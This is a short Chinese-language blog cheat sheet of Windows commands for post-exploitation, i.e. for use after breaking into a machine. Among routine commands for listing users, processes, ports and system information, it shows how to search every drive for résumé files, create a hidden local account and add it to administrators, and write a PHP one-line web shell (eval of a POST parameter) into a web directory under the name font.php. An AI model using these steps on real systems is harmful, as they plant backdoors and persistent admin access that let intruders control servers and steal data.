0x00 前言

后渗透基础 – Windows常用命令 。如果知道目标存在某文件或者文件夹，又苦于不想一个一个的翻找，那么就试试 find + dir 命令吧。

0x01 全盘搜索命令

dir c:\ d:\ e:\ /s /b | find "简历.pdf"

搜索 C、D、E 盘下的文件名中带有 简历.pdf 的文件。

dir 显示目录中的文件和子目录列表。

/b 使用空格式 (没有标题信息或摘要)。

/s 显示指定目录和所有子目录中的文件。

0x02 系统用户相关

net user # 查询当前服务器所有的账户

net localgroup	# 查看计算机用户组列表

net user username # 查询指定用户的具体信息

net user username password /add # 创建一个新的账户，注意，密码设置最好选择数字+字母+特殊符号。

net localgroup administrators cs /add 
# administrators(想要提升到的用户组) cs(想要提升到指定用户组的账户)

net user user /del # 删除指定用户

quser # 查看当前服务器用户连接状态

logoff num # num指代标识符注销指定用户和服务器之间的连接，如果标识符为空，则注销当前连接，标识符可通过quser命令查看。

0x03 输入输出相关

echo 111111 # 输出显示111111
>> # 自动换行写入
>  # 覆盖原内容写入	
^  # 转义，原样特殊字符
ipconfig >> C:/1.txt # 将ipconfig的执行结果输出到C:/1.txt
echo ^<?php @eval($_POST['keefe']); ?^> >C:/AutoSet10/public_html/font.php	# 输出一句话到/www/1.php

0x04 信息查看相关

systeminfo  # 查看系统版本信息

netstat -ano	# 查看系统开放端口

tasklist /svc	# 查看系统进程

ipconfig	# 查看ip地址

ipconfig /all   #查看网络详细

whoami	# 查看当前用户

0x05 进程端口相关

tasklist	# 列出当前计算机运行的程序
taskkill /f /im xx.exe	# 结束指定程序
taskkill /f /pid 111	# 结束pid为111的端口

转载请注明：Adminxe's Blog » 后渗透基础 – Windows常用命令